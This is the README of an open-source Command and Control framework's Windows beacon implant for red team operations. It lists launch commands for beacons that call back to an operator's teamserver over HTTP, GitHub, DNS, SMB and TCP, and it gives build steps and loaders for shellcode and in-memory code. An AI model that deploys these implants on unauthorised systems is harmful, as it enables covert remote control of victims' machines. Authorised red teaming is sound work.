Exploration is a lightweight, modular Command and Control (C2) framework designed for red team operations. This repository provides the Beacon component implemented in C++ for targeting Windows systems. The corresponding TeamServer and Client components are available in the C2TeamServer repository.
This project includes multiple Beacons capable of communicating with the TeamServer through a variety of channels. Supported communication methods include HTTP/HTTPS, GitHub, DNS, SMB, and TCP.
```
# HTTP/HTTPS
BeaconHttp.exe <TEAMSERVER_IP> <LISTENER_PORT> <http|https>
BeaconHttp.exe 10.10.10.10 8443 https
BeaconHttp.exe 10.10.10.10 8080 http

# GitHub
BeaconGithub.exe <GITHUB_USER/REPO> <ACCESS_TOKEN>
BeaconGithub.exe maxDcb/C2Implant ghp_dsfgdfhdf5554456g4fdg465...

# DNS
BeaconDns.exe <DNS_SERVER> <TEAMSERVER_DOMAIN>
BeaconDns.exe 8.8.8.8 bac.superdomain.com

# SMB
BeaconSmb.exe <LISTENER_IP> <PIPE_NAME>
BeaconSmb.exe 127.0.0.1 pipename

# TCP
BeaconTcp.exe <LISTENER_IP> <LISTENER_PORT>
BeaconTcp.exe 127.0.0.1 4444
```
This project relies on several third-party libraries and tools:
- Donut: Generates shellcode from PE files.
- COFFLoader: Executes object files such as those in CS-Situational-Awareness-BOF.
- MemoryModule: Enables runtime DLL loading.
- UnmanagedPowerShell: Executes PowerShell from unmanaged code.
- cpp-base64: Base64 encoding/decoding.
- nlohmann/json: JSON parsing.
Install prerequisites:
- Chocolatey
- CMake:
```
choco install cmake --pre
```
Initialize submodules and set up the build directory:
```
git submodule update --init
mkdir buildWindows
cd buildWindows
```
Using the "x64 Native Tools Command Prompt for VS":
```
# With tests and logging enabled:
cmake -G "Visual Studio 17 2022" -DWITH_TESTS=ON ..

# Without tests and logging:
cmake -G "Visual Studio 17 2022" ..

msbuild .\C2Implant.sln /property:Configuration=Release -m
```
Alternatively, open the generated `C2Implant.sln` in Visual Studio and build in Release mode. Ensure the Runtime Library is set to Multi-threaded (/MT).
For a 32-bit (Win32) build:
```
cmake -G "Visual Studio 17 2022" -A "Win32" ..
msbuild .\C2Implant.sln /property:Configuration=Release /p:Platform=Win32 -m
```
- Compiled Beacons: `Release\Beacons`
- Compiled Module DLLs: `Release\Modules`